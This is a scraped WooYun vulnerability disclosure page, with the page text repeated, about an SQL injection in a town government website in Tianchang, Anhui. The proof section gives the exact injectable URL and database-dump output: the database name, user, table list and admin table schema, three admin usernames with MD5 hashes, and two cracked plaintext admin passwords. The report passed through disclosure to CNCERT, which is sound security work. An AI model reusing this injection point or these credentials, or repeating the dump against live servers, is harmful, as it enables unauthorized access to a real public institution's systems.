安徽省天长市某镇人民政府SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046500

漏洞标题：安徽省天长市某镇人民政府SQL注入漏洞

漏洞作者：小驴牙牙

提交时间：2013-12-20 12:35

修复时间：2014-02-03 12:35

公开时间：2014-02-03 12:35

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-20：细节已通知厂商并且等待厂商处理中
2013-12-24：厂商已经确认，细节仅向厂商公开
2014-01-03：细节向核心白帽子及相关领域专家公开
2014-01-13：细节向普通白帽子公开
2014-01-23：细节向实习白帽子公开
2014-02-03：细节向公众公开

简要描述：

SQL注入漏洞

详细说明：

安徽省天长市石梁镇人民政府
http://ahshiliang.gov.cn/
注入点：
http://ahshiliang.gov.cn/info.php?left=1&cat_pid=67'

漏洞证明：

存在注入漏洞：

当前数据库名：

current database:    'sq_ahahiliang'

当前用户名：

current user:    'sq_ahahiliang@%'

数据库表：

Database: sq_ahahiliang
[28 tables]
+------------------+
| admin_mod        |
| admin_user       |
| admin_useroption |
| article          |
| category         |
| cnt              |
| color_code       |
| comes            |
| company_email    |
| control_sys      |
| cr_columninfo    |
| doc_load         |
| edit_type        |
| friend_link      |
| honours          |
| info_set         |
| information      |
| iplist           |
| message          |
| product          |
| set_value        |
| shu              |
| survey           |
| urls             |
| user             |
| videos           |
| yingpin          |
| zhaopin          |
+------------------+

管理员账户表包含字段：

Database: sq_ahahiliang
Table: admin_user
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| date     | datetime    |
| id       | int(11)     |
| realname | varchar(40) |
| username | varchar(64) |
| userpswd | varchar(64) |
| usertype | varchar(20) |
+----------+-------------+

管理员账户，md5值：

Database: sq_ahahiliang
Table: admin_user
[3 entries]
+--------------+----------------------------------+
| username     | userpswd                         |
+--------------+----------------------------------+
| odminstrator | f2b2d89009446ca923b171178658b551 |
| adminstrator | 32ba855f942bf1e16dbe5cff26427a52 |
| admin        | ee399962b75a4e99eae5d66a8eaf7613 |
+--------------+----------------------------------+

破解两个：
odminstrator#5125678
admin#7713750

修复方案：

版权声明：转载请注明来源小驴牙牙@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2013-12-24 21:53

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046500

漏洞标题：安徽省天长市某镇人民政府SQL注入漏洞

相关厂商：安徽省天长市某镇人民政府

漏洞作者：小驴牙牙

提交时间：2013-12-20 12:35

修复时间：2014-02-03 12:35

公开时间：2014-02-03 12:35

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小驴牙牙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046500

漏洞标题：安徽省天长市某镇人民政府SQL注入漏洞

相关厂商：安徽省天长市某镇人民政府

漏洞作者： 小驴牙牙

提交时间：2013-12-20 12:35

修复时间：2014-02-03 12:35

公开时间：2014-02-03 12:35

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-046500"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小驴牙牙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小驴牙牙

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小驴牙牙@乌云